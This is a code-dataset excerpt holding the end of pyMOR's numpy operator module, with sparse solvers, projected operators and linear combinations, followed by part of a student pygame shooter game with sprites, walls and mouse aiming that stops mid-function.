op in operators):\n return LincombOperator(operators, coefficients, num_coefficients=num_coefficients,\n coefficients_name=coefficients_name, name=name)\n else:\n return NumpyLincombMatrixOperator(operators, coefficients, num_coefficients=num_coefficients,\n coefficients_name=coefficients_name, name=name)\n\n @property\n def invert_options(self):\n if self.sparse is None:\n raise ValueError('Sparsity unkown, assemble first.')\n elif self.sparse:\n opts = (('bicgstab-spilu', {'type': 'bicgstab-spilu',\n 'tol': defaults.bicgstab_tol,\n 'maxiter': defaults.bicgstab_maxiter,\n 'spilu_drop_tol': defaults.spilu_drop_tol,\n 'spilu_fill_factor': defaults.spilu_fill_factor,\n 'spilu_drop_rule': defaults.spilu_drop_rule,\n 'spilu_permc_spec': defaults.spilu_permc_spec}),\n 
('bicgstab', {'type': 'bicgstab',\n 'tol': defaults.bicgstab_tol,\n 'maxiter': defaults.bicgstab_maxiter}),\n ('spsolve', {'type': 'spsolve',\n 'permc_spec': defaults.spsolve_permc_spec}))\n if HAVE_PYAMG:\n opts += (('pyamg', {'type': 'pyamg',\n 'tol': defaults.pyamg_tol,\n 'maxiter': defaults.pyamg_maxiter}),\n ('pyamg-rs', {'type': 'pyamg-rs',\n 'strength': defaults.pyamg_rs_strength,\n 'CF': defaults.pyamg_rs_CF,\n 'presmoother': defaults.pyamg_rs_presmoother,\n 'postsmoother': defaults.pyamg_rs_postsmoother,\n 'max_levels': defaults.pyamg_rs_max_levels,\n 'max_coarse': defaults.pyamg_rs_max_coarse,\n 'coarse_solver': defaults.pyamg_rs_coarse_solver,\n 'cycle': defaults.pyamg_rs_cycle,\n 'accel': defaults.pyamg_rs_accel,\n 'tol': defaults.pyamg_rs_tol,\n 'maxiter': defaults.pyamg_rs_maxiter}),\n ('pyamg-sa', {'type': 'pyamg-sa',\n 'symmetry': defaults.pyamg_sa_symmetry,\n 'strength': defaults.pyamg_sa_strength,\n 'aggregate': defaults.pyamg_sa_aggregate,\n 'smooth': defaults.pyamg_sa_smooth,\n 'presmoother': defaults.pyamg_sa_presmoother,\n 'postsmoother': defaults.pyamg_sa_postsmoother,\n 'improve_candidates': defaults.pyamg_sa_improve_candidates,\n 'max_levels': defaults.pyamg_sa_max_levels,\n 'max_coarse': defaults.pyamg_sa_max_coarse,\n 'diagonal_dominance': defaults.pyamg_sa_diagonal_dominance,\n 'coarse_solver': defaults.pyamg_sa_coarse_solver,\n 'cycle': defaults.pyamg_sa_cycle,\n 'accel': defaults.pyamg_sa_accel,\n 'tol': defaults.pyamg_sa_tol,\n 'maxiter': defaults.pyamg_sa_maxiter}))\n opts = OrderedDict(opts)\n def_opt = opts.pop(defaults.default_sparse_solver)\n ordered_opts = OrderedDict(((defaults.default_sparse_solver, def_opt),))\n ordered_opts.update(opts)\n return ordered_opts\n else:\n return OrderedDict((('solve', {'type': 'solve'}),))\n\n def apply(self, U, ind=None, mu=None):\n if self._assembled:\n assert isinstance(U, NumpyVectorArray)\n assert self.check_parameter(mu)\n U_array = U._array[:U._len] if ind is None else U._array[ind]\n return NumpyVectorArray(self._last_op._matrix.dot(U_array.T).T, copy=False)\n else:\n return self.assemble(mu).apply(U, ind=ind)\n\n def export_matrix(self, filename, matrix_name=None, format='matlab', mu=None):\n '''Save matrix of operator to a file.\n\n Parameters\n ----------\n filename\n Name of output file.\n matrix_name\n The name, the output matrix is given. (Comment field is used in\n case of Matrix Market format.) If `None`, the |Operator|'s `name`\n is used.\n format\n Output file format. 
Either `matlab` or `matrixmarket`.\n '''\n assert format in {'matlab', 'matrixmarket'}\n matrix = self.assemble(mu)._matrix\n matrix_name = matrix_name or self.name\n if format is 'matlab':\n savemat(filename, {matrix_name: matrix})\n else:\n mmwrite(filename, matrix, comment=matrix_name)\n\n\nclass NumpyMatrixOperator(NumpyMatrixBasedOperator):\n '''Wraps a 2D |NumPy Array| as a proper |Operator|.\n\n Parameters\n ----------\n matrix\n The |NumPy array| which is to be wrapped.\n name\n Name of the operator.\n '''\n\n assembled = True\n calculate_sid = False\n\n def __init__(self, matrix, name=None):\n assert matrix.ndim <= 2\n if matrix.ndim == 1:\n matrix = np.reshape(matrix, (1, -1))\n self.dim_source = matrix.shape[1]\n self.dim_range = matrix.shape[0]\n self.name = name\n self._matrix = matrix\n self.sparse = issparse(matrix)\n self.calculate_sid = hasattr(matrix, 'sid')\n\n def _assemble(self, mu=None):\n assert self.check_parameter(mu)\n return self\n\n def assemble(self, mu=None):\n assert self.check_parameter(mu)\n return self\n\n def as_vector(self, mu=None):\n if self.dim_source != 1 and self.dim_range != 1:\n raise TypeError('This operator does not represent a vector or linear functional.')\n assert self.check_parameter(mu)\n return NumpyVectorArray(self._matrix.ravel(), copy=True)\n\n def apply(self, U, ind=None, mu=None):\n assert isinstance(U, NumpyVectorArray)\n assert self.check_parameter(mu)\n U_array = U._array[:U._len] if ind is None else U._array[ind]\n return NumpyVectorArray(self._matrix.dot(U_array.T).T, copy=False)\n\n def apply_inverse(self, U, ind=None, mu=None, options=None):\n\n default_options = self.invert_options\n\n if options is None:\n options = default_options.values()[0]\n elif isinstance(options, str):\n options = default_options[options]\n else:\n assert 'type' in options and options['type'] in default_options \\\n and options.viewkeys() <= default_options[options['type']].viewkeys()\n user_options = options\n options = default_options[user_options['type']]\n options.update(user_options)\n\n assert isinstance(U, NumpyVectorArray)\n assert self.dim_range == U.dim\n\n U = U._array[:U._len] if ind is None else U._array[ind]\n if U.shape[1] == 0:\n return NumpyVectorArray(U)\n R = np.empty((len(U), self.dim_source))\n\n if self.sparse:\n if options['type'] == 'bicgstab':\n for i, UU in enumerate(U):\n R[i], info = bicgstab(self._matrix, UU, tol=options['tol'], maxiter=options['maxiter'])\n if info != 0:\n if info > 0:\n raise InversionError('bicgstab failed to converge after {} iterations'.format(info))\n else:\n raise InversionError('bicgstab failed with error code {} (illegal input or breakdown)'.\n format(info))\n elif options['type'] == 'bicgstab-spilu':\n ilu = spilu(self._matrix, drop_tol=options['spilu_drop_tol'], fill_factor=options['spilu_fill_factor'],\n drop_rule=options['spilu_drop_rule'], permc_spec=options['spilu_permc_spec'])\n precond = LinearOperator(self._matrix.shape, ilu.solve)\n for i, UU in enumerate(U):\n R[i], info = bicgstab(self._matrix, UU, tol=options['tol'], maxiter=options['maxiter'], M=precond)\n if info != 0:\n if info > 0:\n raise InversionError('bicgstab failed to converge after {} iterations'.format(info))\n else:\n raise InversionError('bicgstab failed with error code {} (illegal input or breakdown)'.\n format(info))\n elif options['type'] == 'spsolve':\n for i, UU in enumerate(U):\n R[i] = spsolve(self._matrix, UU, permc_spec=options['permc_spec'])\n elif options['type'] == 'pyamg':\n if len(U) > 0:\n U_iter = 
iter(enumerate(U))\n R[0], ml = pyamg.solve(self._matrix, next(U_iter)[1],\n tol=options['tol'],\n maxiter=options['maxiter'],\n return_solver=True)\n for i, UU in U_iter:\n R[i] = pyamg.solve(self._matrix, UU,\n tol=options['tol'],\n maxiter=options['maxiter'],\n existing_solver=ml)\n elif options['type'] == 'pyamg-rs':\n ml = pyamg.ruge_stuben_solver(self._matrix,\n strength=options['strength'],\n CF=options['CF'],\n presmoother=options['presmoother'],\n postsmoother=options['postsmoother'],\n max_levels=options['max_levels'],\n max_coarse=options['max_coarse'],\n coarse_solver=options['coarse_solver'])\n for i, UU in enumerate(U):\n R[i] = ml.solve(UU,\n tol=options['tol'],\n maxiter=options['maxiter'],\n cycle=options['cycle'],\n accel=options['accel'])\n elif options['type'] == 'pyamg-sa':\n ml = pyamg.smoothed_aggregation_solver(self._matrix,\n symmetry=options['symmetry'],\n strength=options['strength'],\n aggregate=options['aggregate'],\n smooth=options['smooth'],\n presmoother=options['presmoother'],\n postsmoother=options['postsmoother'],\n improve_candidates=options['improve_candidates'],\n max_levels=options['max_levels'],\n max_coarse=options['max_coarse'],\n diagonal_dominance=options['diagonal_dominance'])\n for i, UU in enumerate(U):\n R[i] = ml.solve(UU,\n tol=options['tol'],\n maxiter=options['maxiter'],\n cycle=options['cycle'],\n accel=options['accel'])\n else:\n raise ValueError('Unknown solver type')\n else:\n for i, UU in enumerate(U):\n try:\n R[i] = np.linalg.solve(self._matrix, UU)\n except np.linalg.LinAlgError as e:\n raise InversionError('{}: {}'.format(str(type(e)), str(e)))\n\n return NumpyVectorArray(R)\n\n def projected_to_subbasis(self, dim_source=None, dim_range=None, name=None):\n '''Project the operator to a subbasis.\n\n The purpose of this method is to further project an operator that has been\n obtained through :meth:`~pymor.operators.interfaces.OperatorInterface.projected`\n to subbases of the original projection bases, i.e. ::\n\n op.projected(s_basis, r_basis, prod).projected_to_subbasis(dim_source, dim_range)\n\n should be the same as ::\n\n op.projected(s_basis.copy(range(dim_source)), r_basis.copy(range(dim_range)), prod)\n\n For a |NumpyMatrixOperator| this amounts to extracting the upper-left\n (dim_range, dim_source) corner of the matrix it wraps.\n\n Parameters\n ----------\n dim_source\n Dimension of the source subbasis.\n dim_range\n Dimension of the range subbasis.\n\n Returns\n -------\n The projected |Operator|.\n '''\n assert dim_source is None or dim_source <= self.dim_source\n assert dim_range is None or dim_range <= self.dim_range\n name = name or '{}_projected_to_subbasis'.format(self.name)\n return NumpyMatrixOperator(self._matrix[:dim_range, :dim_source], name=name)\n\n\nclass NumpyLincombMatrixOperator(NumpyMatrixBasedOperator, LincombOperatorBase):\n '''A |LincombOperator| representing a linear combination of |NumpyMatrixBasedOperators|.\n\n This class is not intended to be instantiated directly. 
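# apply_inverse() above dispatches on options['type'], with defaults drawn from
# invert_options; a short usage sketch (the matrix and right-hand side are made up):
import numpy as np
import scipy.sparse as sps

op = NumpyMatrixOperator(sps.identity(5, format='csc') * 2.)
rhs = NumpyVectorArray(np.ones((1, 5)))
U1 = op.apply_inverse(rhs, options='spsolve')                  # pick a named option set
U2 = op.apply_inverse(rhs, options={'type': 'bicgstab',
                                    'tol': 1e-12,
                                    'maxiter': 100})           # override selected defaults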
Instead, you should use\n the :meth:`~pymor.operators.interfaces.OperatorInterface.lincomb` method of the given\n |Operators|.\n\n Parameters\n ----------\n operators\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n coefficients\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n num_coefficients\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n coefficients_name\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n name\n Name of the operator.\n '''\n\n def __init__(self, operators, coefficients=None, num_coefficients=None, coefficients_name=None, name=None):\n assert all(isinstance(op, NumpyMatrixBasedOperator) for op in operators)\n super(NumpyLincombMatrixOperator, self).__init__(operators=operators, coefficients=coefficients,\n num_coefficients=num_coefficients,\n coefficients_name=coefficients_name, name=name)\n self.sparse = all(op.sparse for op in operators)\n\n def _assemble(self, mu=None):\n mu = self.parse_parameter(mu)\n ops = [op.assemble(mu) for op in self.operators]\n coeffs = self.evaluate_coefficients(mu)\n if coeffs[0] == 1:\n matrix = ops[0]._matrix.copy()\n else:\n matrix = ops[0]._matrix * coeffs[0]\n for op, c in izip(ops[1:], coeffs[1:]):\n if c == 1:\n try:\n matrix += op._matrix\n except NotImplementedError:\n matrix = matrix + op._matrix\n elif c == -1:\n try:\n matrix -= op._matrix\n except NotImplementedError:\n matrix = matrix - op._matrix\n else:\n try:\n matrix += (op._matrix * c)\n except NotImplementedError:\n matrix = matrix + (op._matrix * c)\n return NumpyMatrixOperator(matrix)\n\n\nclass ProjectedOperator(OperatorBase):\n '''Genric |Operator| for representing the projection of an |Operator| to a subspace.\n\n This class is not intended to be instantiated directly. Instead, you should use\n the :meth:`~pymor.operators.interfaces.OperatorInterface.projected` method of the given\n |Operator|.\n\n Parameters\n ----------\n operator\n The |Operator| to project.\n source_basis\n See :meth:`~pymor.operators.interfaces.OperatorInterface.projected`.\n range_basis\n See :meth:`~pymor.operators.interfaces.OperatorInterface.projected`.\n product\n See :meth:`~pymor.operators.interfaces.OperatorInterface.projected`.\n copy\n If `True`, make a copy of the provided `source_basis` and `range_basis`. 
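# _assemble() above accumulates coeff[0]*A_0 + coeff[1]*A_1 + ..., using in-place
# += / -= when a coefficient is exactly +1 or -1 to avoid temporaries; the plain
# scipy equivalent of that loop (matrices and coefficients are made up):
import scipy.sparse as sps

mats = [sps.identity(4, format='csr'), sps.random(4, 4, density=0.5, format='csr')]
coeffs = [1., 0.5]
acc = mats[0].copy() if coeffs[0] == 1 else mats[0] * coeffs[0]
for A, c in zip(mats[1:], coeffs[1:]):
    acc = acc + A if c == 1 else acc + A * c   # scipy sparse supports + and scalar *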
This is\n usually necessary, as |VectorArrays| are not immutable.\n name\n Name of the projected operator.\n '''\n\n type_source = type_range = NumpyVectorArray\n linear = False\n\n def __init__(self, operator, source_basis, range_basis, product=None, copy=True, name=None):\n assert isinstance(operator, OperatorInterface)\n assert isinstance(source_basis, operator.type_source) or issubclass(operator.type_source, NumpyVectorArray)\n assert issubclass(operator.type_range, type(range_basis)) or issubclass(operator.type_range, NumpyVectorArray)\n assert source_basis is None or source_basis.dim == operator.dim_source\n assert range_basis is None or range_basis.dim == operator.dim_range\n assert product is None \\\n or (isinstance(product, OperatorInterface)\n and range_basis is not None\n and issubclass(operator.type_range, product.type_source)\n and issubclass(product.type_range, type(product))\n and product.dim_range == product.dim_source == operator.dim_range)\n self.build_parameter_type(inherits=(operator,))\n self.dim_source = len(source_basis) if operator.dim_source > 0 else 0\n self.dim_range = len(range_basis) if range_basis is not None else operator.dim_range\n self.name = name\n self.operator = operator\n self.source_basis = source_basis.copy() if source_basis is not None and copy else source_basis\n self.range_basis = range_basis.copy() if range_basis is not None and copy else range_basis\n self.product = product\n\n def apply(self, U, ind=None, mu=None):\n mu = self.parse_parameter(mu)\n if self.source_basis is None:\n if self.range_basis is None:\n return self.operator.apply(U, ind=ind, mu=mu)\n elif self.product is None:\n return NumpyVectorArray(self.operator.apply2(self.range_basis, U, U_ind=ind, mu=mu, pairwise=False).T)\n else:\n V = self.operator.apply(U, ind=ind, mu=mu)\n return NumpyVectorArray(self.product.apply2(V, self.range_basis, pairwise=False))\n else:\n U_array = U._array[:U._len] if ind is None else U._array[ind]\n UU = self.source_basis.lincomb(U_array)\n if self.range_basis is None:\n return self.operator.apply(UU, mu=mu)\n elif self.product is None:\n return NumpyVectorArray(self.operator.apply2(self.range_basis, UU, mu=mu, pairwise=False).T)\n else:\n V = self.operator.apply(UU, mu=mu)\n return NumpyVectorArray(self.product.apply2(V, self.range_basis, pairwise=False))\n\n def projected_to_subbasis(self, dim_source=None, dim_range=None, name=None):\n '''See :meth:`NumpyMatrixOperator.projected_to_subbasis`.'''\n assert dim_source is None or dim_source <= self.dim_source\n assert dim_range is None or dim_range <= self.dim_range\n assert dim_source is None or self.source_basis is not None, 'not implemented'\n assert dim_range is None or self.range_basis is not None, 'not implemented'\n name = name or '{}_projected_to_subbasis'.format(self.name)\n source_basis = self.source_basis if dim_source is None \\\n else self.source_basis.copy(ind=range(dim_source))\n range_basis = self.range_basis if dim_range is None \\\n else self.range_basis.copy(ind=range(dim_range))\n return ProjectedOperator(self.operator, source_basis, range_basis, product=None, copy=False, name=name)\n\n def jacobian(self, U, mu=None):\n assert len(U) == 1\n mu = self.parse_parameter(mu)\n if self.source_basis is None:\n J = self.operator.jacobian(U, mu=mu)\n else:\n J = self.operator.jacobian(self.source_basis.lincomb(U.data), mu=mu)\n return ProjectedLinearOperator(J, source_basis=self.source_basis, range_basis=self.range_basis,\n product=self.product, copy=False, name=self.name + 
'_jacobian').assemble()\n\n\nclass ProjectedLinearOperator(NumpyMatrixBasedOperator):\n '''Genric |Operator| for representing the projection of a linear |Operator| to a subspace.\n\n This class is not intended to be instantiated directly. Instead, you should use\n the :meth:`~pymor.operators.interfaces.OperatorInterface.projected` method of the given\n |Operator|.\n\n Parameters\n ----------\n operator\n The |Operator| to project.\n source_basis\n See :meth:`~pymor.operators.interfaces.OperatorInterface.projected`.\n range_basis\n See :meth:`~pymor.operators.interfaces.OperatorInterface.projected`.\n product\n See :meth:`~pymor.operators.interfaces.OperatorInterface.projected`.\n copy\n If `True`, make a copy of the provided `source_basis` and `range_basis`. This is\n usually necessary, as |VectorArrays| are not immutable.\n name\n Name of the projected operator.\n '''\n\n sparse = False\n\n def __init__(self, operator, source_basis, range_basis, product=None, name=None, copy=True):\n assert isinstance(operator, OperatorInterface)\n assert isinstance(source_basis, operator.type_source) or issubclass(operator.type_source, NumpyVectorArray)\n assert issubclass(operator.type_range, type(range_basis)) or issubclass(operator.type_range, NumpyVectorArray)\n assert source_basis is None or source_basis.dim == operator.dim_source\n assert range_basis is None or range_basis.dim == operator.dim_range\n assert product is None \\\n or (isinstance(product, OperatorInterface)\n and range_basis is not None\n and issubclass(operator.type_range, product.type_source)\n and issubclass(product.type_range, type(product))\n and product.dim_range == product.dim_source == operator.dim_range)\n assert operator.linear\n self.build_parameter_type(inherits=(operator,))\n self.dim_source = len(source_basis) if source_basis is not None else operator.dim_source\n self.dim_range = len(range_basis) if range_basis is not None else operator.dim_range\n self.name = name\n self.operator = operator\n self.source_basis = source_basis.copy() if source_basis is not None and copy else source_basis\n self.range_basis = range_basis.copy() if range_basis is not None and copy else range_basis\n self.product = product\n\n def _assemble(self, mu=None):\n mu = self.parse_parameter(mu)\n if self.source_basis is None:\n if self.range_basis is None:\n return self.operator.assemble(mu=mu)\n elif self.product is None:\n return NumpyMatrixOperator(self.operator.apply2(self.range_basis,\n NumpyVectorArray(np.eye(self.operator.dim_source)),\n pairwise=False, mu=mu),\n name='{}_assembled'.format(self.name))\n else:\n V = self.operator.apply(NumpyVectorArray(np.eye(self.operator.dim_source)), mu=mu)\n return NumpyMatrixOperator(self.product.apply2(self.range_basis, V, pairwise=False),\n name='{}_assembled'.format(self.name))\n else:\n if self.range_basis is None:\n M = self.operator.apply(self.source_basis, mu=mu).data.T\n return NumpyMatrixOperator(M, name='{}_assembled'.format(self.name))\n elif self.product is None:\n return NumpyMatrixOperator(self.operator.apply2(self.range_basis, self.source_basis, mu=mu,\n pairwise=False),\n name='{}_assembled'.format(self.name))\n else:\n V = self.operator.apply(self.source_basis, mu=mu)\n return NumpyMatrixOperator(self.product.apply2(self.range_basis, V, pairwise=False),\n name='{}_assembled'.format(self.name))\n\n def projected_to_subbasis(self, dim_source=None, dim_range=None, name=None):\n '''See :meth:`NumpyMatrixOperator.projected_to_subbasis`.'''\n assert dim_source is None or dim_source <= 
self.dim_source\n assert dim_range is None or dim_range <= self.dim_range\n assert dim_source is None or self.source_basis is not None, 'not implemented'\n assert dim_range is None or self.range_basis is not None, 'not implemented'\n name = name or '{}_projected_to_subbasis'.format(self.name)\n source_basis = self.source_basis if dim_source is None \\\n else self.source_basis.copy(ind=range(dim_source))\n range_basis = self.range_basis if dim_range is None \\\n else self.range_basis.copy(ind=range(dim_range))\n return ProjectedLinearOperator(self.operator, source_basis, range_basis, product=None, copy=False, name=name)\n\n\nclass LincombOperator(LincombOperatorBase):\n '''A generic |LincombOperator| representing a linear combination of arbitrary |Operators|.\n\n This class is not intended to be instantiated directly. Instead, you should use\n the :meth:`~pymor.operators.interfaces.OperatorInterface.lincomb` method of the given\n |Operators|.\n\n Parameters\n ----------\n operators\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n coefficients\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n num_coefficients\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n coefficients_name\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n name\n Name of the operator.\n '''\n\n def __init__(self, operators, coefficients=None, num_coefficients=None, coefficients_name=None, name=None):\n super(LincombOperator, self).__init__(operators=operators, coefficients=coefficients,\n num_coefficients=num_coefficients,\n coefficients_name=coefficients_name, name=name)\n\n def apply(self, U, ind=None, mu=None):\n mu = self.parse_parameter(mu)\n coeffs = self.evaluate_coefficients(mu)\n Vs = [op.apply(U, ind=ind, mu=mu) for op in self.operators]\n R = Vs[0]\n R.scal(coeffs[0])\n for V, c in izip(Vs[1:], coeffs[1:]):\n R.axpy(c, V)\n return R\n","sub_path":"src/pymor/operators/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":44042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"577387618","text":"'''\npygamegame.py\ncreated by Lukas Peraza\n for 15-112 F15 Pygame Optional Lecture, 11/11/15\nuse this code in your term project if you want\n- CITE IT\n- you can modify it to your liking\n - BUT STILL CITE IT\n- you should remove the print calls from any function you aren't using\n- you might want to move the pygame.display.flip() to your redrawAll function,\n in case you don't need to update the entire display every frame (then you\n should use pygame.display.update(Rect) instead)\n'''\nimport pygame\nimport os\nimport random\nimport math\nfrom Walls import *\nfrom Weapons import *\nfrom Player import *\n\n\nclass Monster(pygame.sprite.Sprite):\n def __init__(self, x, y, speed):\n super(Bullet,self).__init__()\n self.x = x\n self.y = y\n self.speed = speed\n self.image = None\n self.rect = pygame.Rect(self.x-2,self.y-2,4,4)\n self.size = self.image.get_size()\n self.bigger_img = pygame.transform.scale(self.image, (int(self.size[0]*2), int(self.size[1]*2)))\n self.image = self.bigger_img\n def getRect(self):\n self.rect = pygame.Rect(self.x,self.y,4,4)\n def update(self):\n self.x += self.speed*self.direction[0]\n self.y += self.speed*self.direction[1]\n self.getRect()\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y, speed, direction):\n super(Bullet,self).__init__()\n self.x = x\n self.y = y\n self.baseX = x\n self.baseY = y\n self.speed = speed\n 
self.direction = direction\n self.image = pygame.image.load(os.path.join(\"spriteAssets\",\"bullet.png\"))\n self.rect = pygame.Rect(self.x-2,self.y-2,4,4)\n self.size = self.image.get_size()\n self.bigger_img = pygame.transform.scale(self.image, (int(self.size[0]*2), int(self.size[1]*2)))\n self.image = self.bigger_img\n def getRect(self):\n self.rect = pygame.Rect(self.x-2,self.y-2,4,4)\n def update(self,dx,dy):\n self.baseX += self.speed*self.direction[0]\n self.baseY += self.speed*self.direction[1]\n self.x = self.baseX + dx\n self.y = self.baseY + dy\n self.getRect()\n\nclass Pointer(pygame.sprite.Sprite):\n def __init__(self, x, y):\n super(Pointer,self).__init__()\n self.x = x\n self.y = y\n self.rect = pygame.Rect(self.x,self.y,16,16)\n self.image = pygame.image.load(os.path.join(\"spriteAssets\",\"pointer.png\"))\n def getRect(self): # GET REKT\n self.rect = pygame.Rect(self.x,self.y,16,16)\n def update(self):\n self.getRect()\n\nclass PygameGame(object):\n\n def init(self):\n ##Player##\n self.p = Player(300,200)\n self.dir = \"Right\"\n self.playerGroup = pygame.sprite.Group()\n self.playerGroup.add(self.p)\n ##Wand##\n self.wand = Wand(self.p.x,self.p.y)\n self.wandGroup = pygame.sprite.Group()\n self.wandGroup.add(self.wand)\n ##Pointer##\n self.Pointer = Pointer(0,0)\n self.PointerGroup = pygame.sprite.Group()\n self.PointerGroup.add(self.Pointer)\n ##Bullets##\n self.bulletGroup = pygame.sprite.Group()\n ##Left Walls##\n self.leftWallGroup = pygame.sprite.Group()\n self.leftWallGroup.add(LeftWall(24,24,\"Top1\"))\n self.leftWallGroup.add(LeftWall(24,48,\"Top2\"))\n for i in range(3,15):\n x, y = 0, i*24\n self.leftWallGroup.add(LeftWall(24,y,\"Mid\"))\n self.leftWallGroup.add(LeftWall(24,360,\"Bot1\"))\n self.leftWallGroup.add(LeftWall(24,384,\"Bot2\"))\n ##Right Walls##\n self.rightWallGroup = pygame.sprite.Group()\n self.rightWallGroup.add(RightWall(552,24,\"Top1\"))\n self.rightWallGroup.add(RightWall(552,48,\"Top2\"))\n for i in range(3,15):\n x, y = 0, i*24\n self.rightWallGroup.add(RightWall(552,y,\"Mid\"))\n self.rightWallGroup.add(RightWall(552,360,\"Bot1\"))\n self.rightWallGroup.add(RightWall(552,384,\"Bot2\"))\n ##Mid Walls##\n self.midWallTopGroup = pygame.sprite.Group()\n self.midWallBotGroup = pygame.sprite.Group()\n for i in range(22):\n self.midWallTopGroup.add(MidWall(48+i*24,24,\"Top1\"))\n self.midWallTopGroup.add(MidWall(48+i*24,48,\"Top2\"))\n for i in range(22):\n self.midWallBotGroup.add(MidWall(48+i*24,360,\"Bot1\"))\n self.midWallBotGroup.add(MidWall(48+i*24,384,\"Bot2\"))\n ##Floors##\n self.floorGroup = pygame.sprite.Group()\n for row in range(23):\n for col in range(3,16):\n self.floorGroup.add(Floor(24+row*24,col*24))\n ##MISC.##\n self.dirx = 1\n self.diry = 1\n self.mouseX = 0\n self.mouseY = 0\n self.mouseAngle = 0\n self.xMargin = 0\n self.yMargin = 0\n pass\n\n def mousePressed(self, x, y):\n dirx = x-self.p.x\n diry = y-self.p.y\n l = math.sqrt(dirx**2 + diry**2)\n direction = [(x-self.p.x)/l,(y-self.p.y)/l]\n self.bulletGroup.add(Bullet(self.p.x-self.xMargin,self.p.y-self.yMargin,5,direction))\n self.bulletGroup.update(self.xMargin,self.yMargin)\n # self.p.x -= 6*direction[0]\n # self.p.y -= 6*direction[1]\n # if pygame.sprite.groupcollide(self.leftWallGroup,self.playerGroup,False,False) != {}:\n # self.p.x += 6*direction[0]\n # if pygame.sprite.groupcollide(self.rightWallGroup,self.playerGroup,False,False) != {}:\n # self.p.x += 6*direction[0]\n pass\n\n def mouseReleased(self, x, y):\n pass\n\n def mouseMotion(self, x, y):\n self.mouseX 
= x\n self.mouseY = y\n dirx = self.dirx\n diry = self.diry\n l = math.sqrt(dirx**2 + diry**2)\n direction = [(x-self.p.x)/l,(y-self.p.y)/l]\n angle = 0\n if direction[0] != 0 and direction[0] > 0 and direction[1] < 0:\n angle = ((-180/math.pi)*math.atan(direction[1]/direction[0]))\n elif direction[0] != 0 and direction[0] < 0 and direction[1] < 0:\n angle = ((-180/math.pi)*math.atan(direction[1]/direction[0])+180)\n elif direction[0] < 0 and direction[1] > 0:\n angle = ((-180/math.pi)*math.atan(direction[1]/direction[0])+180)\n elif direction[0] != 0 and direction[1] != 0:\n angle = ((-180/math.pi)*math.atan(direction[1]/direction[0])+360)\n elif math.isclose(direction[0],0):\n if direction[1] > 0:\n angle = 270\n else:\n angle = 90\n elif math.isclose(direction[1],0):\n if direction[0] < 0:\n angle = 180\n self.wand.rotateImage(angle)\n self.mouseAngle = angle\n\n self.Pointer.x = x-8\n self.Pointer.y = y-8\n if x>self.p.x:\n self.dir = \"Right\"\n else:\n self.dir = \"Left\"\n pass\n\n def mouseDrag(self, x, y):\n pass\n\n def keyPressed(self, keyCode, modifier):\n if keyCode == pygame.K_a:\n self.p.xSpeed = -3\n if keyCode == pygame.K_d:\n self.p.xSpeed = 3\n if keyCode == pygame.K_w:\n self.p.ySpeed = -3\n if keyCode == pygame.K_s:\n self.p.ySpeed = 3\n pass\n\n def keyReleased(self, keyCode, modifier):\n if keyCode == pygame.K_a:\n if self.p.xSpeed != 3:\n self.p.xSpeed = 0\n if keyCode == pygame.K_d:\n if self.p.xSpeed != -3:\n self.p.xSpeed = 0\n if keyCode == pygame.K_w:\n if self.p.ySpeed != 3:\n self.p.ySpeed = 0\n if keyCode == pygame.K_s:\n if self.p.ySpeed != -3:\n self.p.ySpeed = 0\n pass\n\n def timerFired(self, dt):\n ##Player Position##\n self.p.update()\n self.p.imageUpdate(self.dir)\n ##Player Collision##\n if pygame.sprite.groupcollide(self.leftWallGroup,self.playerGroup,False,False) != {}:\n self.xMargin += self.p.xSpeed\n if pygame.sprite.groupcollide(self.rightWallGroup,self.playerGroup,False,False) != {}:\n self.xMargin += self.p.xSpeed\n if pygame.sprite.groupcollide(self.midWallTopGroup,self.playerGroup,False,False) != {}:\n self.yMargin += self.p.ySpeed\n if pygame.sprite.groupcollide(self.midWallBotGroup,self.playerGroup,False,False) != {}:\n self.yMargin += self.p.ySpeed\n ##Margin Update##\n if self.p.x > 305 or self.p.x < 295 or self.p.y < 195 or self.p.y > 205:\n self.p.unupdate()\n self.xMargin -= self.p.xSpeed\n self.yMargin -= self.p.ySpeed\n self.leftWallGroup.update(self.xMargin,self.yMargin)\n self.rightWallGroup.update(self.xMargin,self.yMargin)\n self.midWallTopGroup.update(self.xMargin,self.yMargin)\n self.midWallBotGroup.update(self.xMargin,self.yMargin)\n self.floorGroup.update(self.xMargin,self.yMargin)\n self.bulletGroup.update(self.xMargin,self.yMargin)\n else:\n self.bulletGroup.update(self.xMargin,self.yMargin)\n ##Pointer##\n self.Pointer.update()\n ##Wand Rotation##\n self.wand.rotateUpdate(self.mouseX, self.mouseY, self.p.x, self.p.y)\n ##Bullet Collisions##\n pygame.sprite.groupcollide(self.leftWallGroup,self.bulletGroup,False,True)\n pygame.sprite.groupcollide(self.rightWallGroup,self.bulletGroup,False,True)\n pygame.sprite.groupcollide(self.midWallTopGroup,self.bulletGroup,False,True)\n pygame.sprite.groupcollide(self.midWallBotGroup,self.bulletGroup,False,True)\n \n pass\n\n def redrawAll(self, screen):\n screen.fill((45, 45, 45))\n ############################################################\n # pygame.draw.rect(screen, (200,200,200), self.p.rect)\n # pygame.draw.rect(screen, (200,200,200), self.Pointer.rect)\n 
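# The Monster class earlier in this file calls super(Bullet, self) and leaves
# self.image as None before querying its size, so it cannot run as written; a
# minimal corrected sketch (the placeholder surface and default direction are
# assumptions, since the original asset is not shown):
import pygame

class Monster(pygame.sprite.Sprite):
    def __init__(self, x, y, speed, direction=(0, 0)):
        super(Monster, self).__init__()       # was: super(Bullet, self)
        self.x, self.y = x, y
        self.speed = speed
        self.direction = direction            # update() reads this; it was never set
        self.image = pygame.Surface((8, 8))   # placeholder; the original left image unset
        self.rect = pygame.Rect(self.x - 2, self.y - 2, 4, 4)

    def update(self):
        self.x += self.speed * self.direction[0]
        self.y += self.speed * self.direction[1]
        self.rect = pygame.Rect(self.x, self.y, 4, 4)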
